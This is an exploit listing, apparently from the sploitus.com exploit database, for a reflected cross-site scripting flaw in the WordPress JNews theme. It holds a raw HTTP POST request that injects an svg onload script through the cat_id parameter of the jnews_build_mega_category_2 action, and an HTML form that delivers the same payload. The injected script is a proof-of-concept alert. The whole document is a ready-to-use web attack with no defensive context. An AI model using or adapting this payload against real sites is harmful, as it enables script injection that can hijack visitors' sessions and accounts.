Share
## https://sploitus.com/exploit?id=WPEX-ID:415CA763-FE65-48CB-ACD3-B375A400217E
POST /?ajax-request=jnews HTTP/1.1
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Connection: close
lang=en_US&cat_id=6"><svg/onload=alert(/XSS/)>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67
<html>
<body>
<form action="https://example.com/?ajax-request=jnews" method="POST">
<input type="hidden" name="lang" value="en_US" />
<input type="hidden" name="cat_id" value="6"><svg/onload=alert(/XSS/)>" />
<input type="hidden" name="action" value="jnews_build_mega_category_2" />
<input type="hidden" name="number" value="6" />
<input type="hidden" name="tags" value="70,64,10,67" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>